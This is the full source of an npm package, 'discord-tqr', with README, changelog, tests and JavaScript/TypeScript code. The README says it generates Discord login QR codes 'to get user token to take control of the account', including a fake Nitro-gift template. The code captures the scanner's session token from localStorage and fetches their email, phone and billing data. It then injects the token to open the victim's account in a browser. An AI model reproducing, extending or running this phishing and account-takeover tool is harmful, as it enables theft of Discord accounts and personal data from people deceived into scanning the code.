README.md
# Discord-tqr

Generate QR code to get user token to take control of the account, get informations ...

## Update

See the [changelog](CHANGELOG.md)

## 💻 Installation

```
$ npm i discord-tqr
```

## 📚 Usage

### Import

```js
import DiscordTQR from "discord-tqr";
//or
const DiscordTQR = require("discord-tqr").default;
```

### API

```js
const handler = new DiscordTQR();
```

## Generate a QR Code

<img src="./assets/qr.png" alt="QR Code" height="200"></img>
<img src="./assets/qr-with-template.png" alt="QR Code" height="200"></img>

### Options:

- `path?`: string - Path where you want to save the QR code in png format
- `template?`: "default" | { path: string, x?: number, y?: number, width?: number, height?: number } - If you want to apply a template to the QR code. With "default" you can create a fake nitro gift. You can also make a custom one with `path` for the template image and `x, y, width, height` for the x/y position of the QR code on the template and the width/height for the size of the QR code on the template.
- `wait?`: number - If you have trouble when getting the QR Code you can wait full page loaded by setting a wait time in ms like 5000 (by default it's 0).
- `browserOptions?`: PuppeteerLaunchOptions - Browser options for puppeter by default it's `{ headless: true, defaultViewport: null }`

```ts
const base64QrCode = await handler.getQRCode(options?: {
    path?: string,
    browserOptions?: PuppeteerLaunchOptions,
    wait?: number,
    template?: "default" | { path?: string, x?: number, y?: number, width?: number, height?: number },
    encoding?: string
});
```

## Listening for token

> **_NOTE:_** This method work only if you launch "getQRCode" before. It can also be block by a recaptcha

Return the token in a string when the QR code is scanned

```ts
const token = await handler.listenForToken();
```

## Get user informations

Return a json object with user informations like subscription, email, phone, avatar, name ...

### Options

- `token?`: string - The token of the user by default it's the token from `listForToken` method

```ts
const user = await handler.getDiscordAccountInfo(token?: string);
```

### Result

```js
{
  id: '...',
  username: '...',
  avatar: '...',
  avatar_decoration: null,
  discriminator: '...',
  public_flags: 0,
  flags: 0,
  banner: null,
  banner_color: null,
  accent_color: null,
  bio: '...',
  locale: 'fr',
  nsfw_allowed: true,
  mfa_enabled: false,
  email: '...',
  verified: true,
  phone: "...",
  user: '...#...',
  avatar_url: 'https://cdn.discordapp.com/avatars/...',
  subscription: [...]
}
```

## Open user account

Open a discord account in chromium with puppeteer and with the token

### options:

- `token?`: string - The token of the user by default it's the token from `listForToken` method
- `browserOptions?`: PuppeteerLaunchOptions - Browser options for puppeter by default it's `{ headless: false, defaultViewport: null, args: ["--start-fullscreen"] }`

```ts
const {browser, page} = await handler.openDiscordAccount(options?: { token?: string, browserOptions?: PuppeteerLaunchOptions });
```

## Close browser for QR code generation

Close the browser used for generating the QR Code and by `listenForToken`

```ts
await handler.closeConnection();
```

# Example

```js
const path = require("path");
const DiscordTQR = require("discord-tqr").default;

(async function () {
  try {
    const handler = new DiscordTQR();

    console.log("Creating qr code...");
    await handler.getQRCode({
      path: path.resolve(__dirname, "./qr-with-template.png"),
      template: "default",
    });
    console.log("QR code created to ./qr-with-template.png !");

    console.log("Waiting for token...");
    await handler.listenForToken();
    console.log("Token: ", handler.token);

    console.log("Getting user informations...");
    await handler.getDiscordAccountInfo();
    console.log("User information:", handler.user);

    console.log("Opening user account...");
    const { browser, page } = await handler.openDiscordAccount();

    setTimeout(async () => {
      console.log("Closing opened browser...");
      await browser.close();
    }, 60000);

    console.log("Closing connection...");
    await handler.closeConnection();
  } catch (e) {
    console.log(e);
  }
})();
```


CHANGELOG.md
# CHANGELOG

## v1.0.4

- Fixed QR code creation

## v1.0.3

- Fixed `listenForToken`
- No more full screen for `openDiscordAccount`
- `getQrCode` return a base64 image instead of a Buffer
- Updated api from v9 to v10

## v1.0.2

- puppeteer dependencie update
- More types
- Fixed QR code creation


test/test.js
const path = require("path");

const DiscordTQR = require("../dist").default;
(async function () {
  try {
    const handler = new DiscordTQR();

    console.log("Creating qr code...");
    await handler.getQRCode({
      path: path.resolve(__dirname, "../assets/qr.png"),
      // browserOptions: { headless: false, defaultViewport: null },
      template: "default",
    });
    console.log("QR code created !");

    console.log("Waiting for token...");
    await handler.listenForToken();
    console.log("Token: ", handler.token);

    console.log("Opening user account...");
    const { browser, page } = await handler.openDiscordAccount();

    console.log("Getting user informations...");
    await handler.getDiscordAccountInfo();
    console.log("User information:", handler.user);

    // setTimeout(async () => {
    //   console.log("Closing opened browser...");
    //   await browser.close();
    // }, 20000);

    console.log("Closing connection...");
    await handler.closeConnection();
  } catch (e) {
    console.log(e);
  }
})();


test/test.ts
import DiscordTQR from "../dist";

(async function () {
  try {
    const handler = new DiscordTQR();

    console.log("Creating qr code...");
    await handler.getQRCode({ path: "../assets/qr.png", template: "default" });
    console.log("QR code created !");

    console.log("Waiting for token...");
    await handler.listenForToken();
    console.log("Token: ", handler.token);

    console.log("Opening user account...");
    const [browser, page] = await handler.openDiscordAccount();

    console.log("Getting user informations...");
    await handler.getDiscordAccountInfo();
    console.log("User information:", handler.user);

    setTimeout(async () => {
      console.log("Closing opened browser...");
      await browser.close();
    }, 20000);

    console.log("Closing connection...");
    await handler.closeConnection();
  } catch (e) {
    console.log(e);
  }
})();


test/types-test.ts
import DiscordTQR from "../dist";

(async function () {
  try {
    const handler = new DiscordTQR();

    console.log("Creating qr code...");
    await handler.getQRCode({ path: "../assets/qr.png", template: "default" });
    console.log("QR code created !");

    console.log("Waiting for token...");
    await handler.listenForToken();
    console.log("Token: ", handler.token);

    console.log("Opening user account...");
    const { browser, page } = await handler.openDiscordAccount();

    console.log("Getting user informations...");
    await handler.getDiscordAccountInfo();
    console.log("User information:", handler.user);

    setTimeout(async () => {
      console.log("Closing opened browser...");
      await browser.close();
    }, 20000);

    console.log("Closing connection...");
    await handler.closeConnection();
  } catch (e) {
    console.log(e);
  }
})();


index.js
const puppeteer = require("puppeteer");
const got = require("got");

class DiscordQRCodeTokenHandler {
  constructor(token) {
    this.$browser = null;
    this.$page = null;

    this.$openedBrowser = null;

    this.token = token;
    this.qr = null;
    this.user = null;

    this.loginUrl = "https://discord.com/login";
    this.discordUserApi = "https://discord.com/api/v9/users/@me";
    this.discordSubscriptionApi =
      "https://discordapp.com/api/v9/users/@me/billing/subscriptions";
    this.httpHeader = {
      accept:
        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
      "user-agent":
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36",
      "accept-encoding": "gzip, deflate, br",
      "accept-language": "fr-FR,fr;q=0.9,fr;q=0.8",
    };
  }

  async getQRCode(options = {}) {
    this.$browser = await puppeteer.launch({ headless: true });
    this.$page = (await this.$browser.pages())[0];

    const page = this.$page;

    await this.$page.setViewport({
      width: 1920,
      height: 1080,
    });

    await page.setExtraHTTPHeaders(this.httpHeader);

    await page.goto(this.loginUrl, {
      waitUntil: "domcontentloaded",
    });

    await page.waitForSelector("canvas");

    const canvas = await page.$("canvas");
    const parentCanvas = await canvas.getProperty("parentNode");
    const qr = await parentCanvas.getProperty("parentNode");

    const data = await qr.screenshot(
      options.path ? { path: options.path } : {}
    );

    this.qr = data;

    return data;
  }

  async listenForToken() {
    const page = this.$page;

    await page.waitForNavigation({ timeout: 60000 });

    const token = await page.evaluate(() => {
      window.dispatchEvent(new Event("beforeunload"));

      const iframe = document.createElement("iframe");
      iframe.style.display = "none";
      document.body.appendChild(iframe);
      const localStorage = iframe.contentWindow.localStorage;
      return JSON.parse(localStorage.token);
    });

    this.token = token;

    return token;
  }

  async getDiscordAccountInfo(token) {
    token = token ?? this.token;

    if (!token) throw new Error("Invalide token");

    const scrapInfo = await got.get(this.discordUserApi, {
      headers: { Authorization: token },
    });
    const info = JSON.parse(scrapInfo.body);

    const scrapSub = await got.get(this.discordSubscriptionApi, {
      headers: { Authorization: token },
    });
    const sub = JSON.parse(scrapSub.body);

    const user = {
      ...info,
      user: info.username + "#" + info.discriminator,
      avatar_url:
        "https://cdn.discordapp.com/avatars/" + info.id + "/" + info.avatar,
      subscription: sub,
    };

    this.user = user;

    return user;
  }

  async openDiscordAccount(token) {
    token = token ?? this.token;

    if (!token) throw new Error("Invalide token");

    this.$openedBrowser = await puppeteer.launch({
      headless: false,
      defaultViewport: null,
      args: ["--start-fullscreen"],
    });

    const page = (await this.$openedBrowser.pages())[0];

    await page.goto(this.loginUrl, {
      waitUntil: "domcontentloaded",
    });

    await page.evaluate((token) => {
      setInterval(() => {
        document.body.appendChild(
          document.createElement`iframe`
        ).contentWindow.localStorage.token = `"${token}"`;
      }, 50);
      setTimeout(() => {
        location.reload();
      }, 2500);
    }, token);
  }

  async closeOpenedBrowserConnection() {
    const browser = this.$openedBrowser;
    await browser.close();
  }

  async closeConnection() {
    const browser = this.$browser;
    await browser.close();
  }
}

module.exports = DiscordQRCodeTokenHandler;


index.ts
"use strict";

import jimg from "jimg";
import puppeteer, { Browser, Page, PuppeteerLaunchOptions } from "puppeteer";
import fs from "fs";
import path from "path";
import fetch from "node-fetch";

import { APIUser } from "discord-api-types/v10";

type DiscordTQRConfig = {
  loginUrl: string;
  discordUserApi: string;
  discordSubscriptionApi: string;
  httpHeader: Record<string, string>;
};

type UserInfo = APIUser & {
  user: string;
  avatar_url: string;
  subscription: BillingSubscriptionsResponse;
};

interface BillingSubscription {
  id: string;
  planId: string;
  status: string;
  currentPeriodStart: string;
  currentPeriodEnd: string;
  created: string;
}

interface BillingSubscriptionsResponse {
  subscriptions: BillingSubscription[];
}

class DiscordTQR {
  private $browser: Browser = null;
  private $page: Page = null;

  public qr: string = null;
  public user: UserInfo = null;

  public config: DiscordTQRConfig = {
    loginUrl: "https://discord.com/login",
    discordUserApi: "https://discord.com/api/v10/users/@me",
    discordSubscriptionApi:
      "https://discordapp.com/api/v10/users/@me/billing/subscriptions",
    httpHeader: {
      accept:
        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
      "user-agent":
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
      "accept-encoding": "gzip, deflate, br",
      "accept-language": "fr-FR,fr;q=0.9,fr;q=0.8",
    },
  };

  constructor(public token?: string) {}

  /**
   * Create a login QR Code
   * @param options
   * @returns
   */
  async getQRCode(
    options: {
      path?: string;
      browserOptions?: PuppeteerLaunchOptions;
      encoding?: string;
      wait?: number;
      template?:
        | {
            path: string;
            x?: number;
            y?: number;
            width?: number;
            height?: number;
          }
        | "default";
    } = {}
  ): Promise<string> {
    if (typeof options.template === "string" && options.template !== "default")
      throw new Error("Invalide value for 'template'");

    if (this.$browser || this.$page) await this.closeConnection();

    this.$browser = await puppeteer.launch(
      options?.browserOptions
        ? options.browserOptions
        : { headless: "new", defaultViewport: null }
    );

    this.$page = (await this.$browser.pages())[0];

    const page = this.$page;

    await page.setViewport({
      width: 1920,
      height: 1080,
      deviceScaleFactor: 1,
    });

    await page.setExtraHTTPHeaders(this.config.httpHeader);

    await page.goto(this.config.loginUrl, {
      waitUntil: "networkidle2",
    });

    await page.waitForSelector('[class^="qrCodeOverlay"]');

    if (options?.wait) await new Promise((r) => setTimeout(r, options.wait));

    const qrC = await page.$('[class^="qrCodeOverlay"]');

    let data = await qrC.screenshot({
      ...(options.path && !options.template ? { path: options.path } : {}),
      ...(options.encoding ? { path: options.encoding } : {}),
      captureBeyondViewport: false,
    });

    let finalImageBase64 =
      data instanceof Buffer ? data.toString("base64") : data;

    //template
    if (options.template) {
      const tmpFile = path.resolve(__dirname, "./tmp.png");
      fs.writeFileSync(tmpFile, finalImageBase64, "base64");
      const optionsJimg = {
        path: options.path,
        images: [
          {
            path:
              options.template === "default"
                ? path.resolve(__dirname, "../assets/template.png")
                : options.template.path,
          },
          options.template === "default"
            ? {
                path: tmpFile,
                x: 102,
                y: 390,
                width: 200,
                height: 200,
              }
            : { ...options.template, path: tmpFile },
        ],
      };
      finalImageBase64 = await jimg(optionsJimg);
      fs.unlinkSync(tmpFile);
    }

    this.qr = finalImageBase64;

    return finalImageBase64;
  }

  /**
   * Listen for token and return it when the program get it
   * @returns
   */
  async listenForToken(): Promise<string> {
    if (!this.$browser || !this.$page)
      throw new Error("This method need to be launch after 'getQRCode' method");

    const page = this.$page;

    try {
      await page.waitForNavigation({ timeout: 60000 });
    } catch (e) {
      throw new Error(
        "Max time reached (1 minute). The QR code is not valide anymore"
      );
    }

    const token = await page.evaluate(() => {
      window.dispatchEvent(new Event("beforeunload"));
      const iframe = document.createElement("iframe");
      iframe.style.display = "none";
      document.body.appendChild(iframe);
      const localStorage = iframe.contentWindow.localStorage;
      return JSON.parse(localStorage.token);
    });

    this.token = token;

    return token;
  }

  /**
   * Return informations about the user account from the discord api like email, phone, name...
   * @param token
   * @returns
   */
  async getDiscordAccountInfo(token?: string) {
    token = token ?? this.token;

    if (!token) throw new Error("Invalide token");

    const scrapInfo = await fetch(this.config.discordUserApi, {
      headers: { Authorization: token },
    });
    const info: APIUser = await scrapInfo.json();

    const scrapSub = await fetch(this.config.discordSubscriptionApi, {
      headers: { Authorization: token },
    });
    const sub: BillingSubscriptionsResponse = await scrapSub.json();

    const user: UserInfo = {
      ...info,
      user: info.username + "#" + info.discriminator,
      avatar_url:
        "https://cdn.discordapp.com/avatars/" + info.id + "/" + info.avatar,
      subscription: sub,
    };

    this.user = user;

    return user;
  }

  /**
   * Open the discord account in puppeter and return the browser and page corresponding
   * @param options
   * @returns
   */
  async openDiscordAccount(
    options: {
      token?: string;
      browserOptions?: PuppeteerLaunchOptions;
    } = {}
  ): Promise<{ browser: Browser; page: Page }> {
    const token = options?.token ?? this.token;

    if (!token) throw new Error("Invalide token");

    const browser = await puppeteer.launch(
      options?.browserOptions
        ? options.browserOptions
        : {
            headless: false,
            defaultViewport: null,
          }
    );

    const page = (await browser.pages())[0];

    await page.setExtraHTTPHeaders(this.config.httpHeader);

    await page.goto(this.config.loginUrl, {
      waitUntil: "domcontentloaded",
    });

    await page.evaluate((token: string) => {
      setInterval(() => {
        document.body.appendChild(
          document.createElement("iframe")
        ).contentWindow.localStorage.token = `"${token}"`;
      }, 50);
      setTimeout(() => {
        location.reload();
      }, 2500);
    }, token);

    return { browser, page };
  }

  /**
   * Close the opened browser used to generate QR Code and to listen the token
   */
  async closeConnection() {
    if (this.$browser) {
      const browser = this.$browser;
      await browser.close();
      this.$browser = null;
      this.$page = null;
    }
  }
}

export default DiscordTQR;
